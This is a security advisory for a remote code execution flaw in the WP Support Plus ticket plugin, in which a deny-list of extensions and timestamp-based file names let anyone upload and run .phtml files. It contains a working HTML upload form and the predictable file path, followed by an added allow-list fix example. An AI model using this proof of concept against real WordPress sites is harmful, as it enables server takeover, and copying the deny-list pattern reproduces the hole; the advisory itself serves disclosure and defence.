WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution
2017-11-12T00:00:00
ID WPEX-ID:85D3126A-34A3-4799-A94B-76D7B835DB5F Type wpexploit Reporter Robert Mathews Modified 2020-09-22T08:34:37
Description
WP Support Plus Responsive Ticket System <= 8.0.7 allows anyone to upload PHP files with extensions like ".phtml", ".php4", ".php5", and so on, all of which are executed as if their extension were ".php" on most hosting platforms. This is because "includes/admin/attachment/uploadAttachment.php" rejects uploads using a deny-list of extensions:

    switch ($extension){
        case 'exe':
        case 'php':
        case 'js':
            $isError=true;
            $errorMessege=__('Error: file format not supported!','wp-support-plus-responsive-ticket-system');

It does not check for other executable extensions such as ".phtml". In addition, it saves the file under a predictable name derived from the upload timestamp, so anyone can request the file and run the code it contains. Plugin author notified 2017-11-09.
<form method="post" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="wpsp_upload_attachment">
    Choose a file ending with .phtml:
    <input type="file" name="0">
    <input type="submit" value="Submit">
</form>
After doing this, an uploaded file can be accessed at, say:
http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml
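The two weaknesses described above (a deny-list of extensions and a timestamp-based filename) side by side with an allow-list check and a random stored name. This is an added illustration, not code from the plugin or its fix; the function names are hypothetical and the extension handling is simplified.

```php
<?php
// Added example, not the plugin's code. Function names are hypothetical.

// Deny-list pattern, as described in the advisory: anything not explicitly
// listed is accepted, so ".phtml", ".php4", ".php5" and similar pass through.
function denylist_allows(string $filename): bool {
    $extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    switch ($extension) {
        case 'exe':
        case 'php':
        case 'js':
            return false;
    }
    return true;
}

// Allow-list pattern: only the attachment types a ticket system needs,
// checked against the whole filename so double extensions ("x.php.png")
// are rejected too, and a random stored name instead of time() so the
// saved path cannot be guessed from the upload timestamp.
function allowlist_stored_name(string $filename): ?string {
    static $allowed = ['png', 'jpg', 'jpeg', 'gif', 'pdf', 'txt'];
    $base = basename($filename);
    // Exactly one dot: a simple name part followed by a single extension.
    if (!preg_match('/^[A-Za-z0-9_-]+\.([A-Za-z0-9]+)$/', $base, $m)) {
        return null;
    }
    $extension = strtolower($m[1]);
    if (!in_array($extension, $allowed, true)) {
        return null;
    }
    // 128 bits of randomness; the original name is not reused on disk.
    return bin2hex(random_bytes(16)) . '.' . $extension;
}

// Constructed sample filenames to compare both checks.
foreach (['notes.txt', 'shell.phtml', 'shell.php5', 'shell.php.png', 'shell.PHP'] as $f) {
    printf("%-15s deny-list: %-5s allow-list: %s\n", $f,
        denylist_allows($f) ? 'pass' : 'block',
        allowlist_stored_name($f) ?? 'block');
}
```

In a real WordPress plugin the upload should additionally go through wp_handle_upload(), which applies WordPress's own allowed-type and MIME checks, and the uploads directory should be configured so the web server never executes scripts from it.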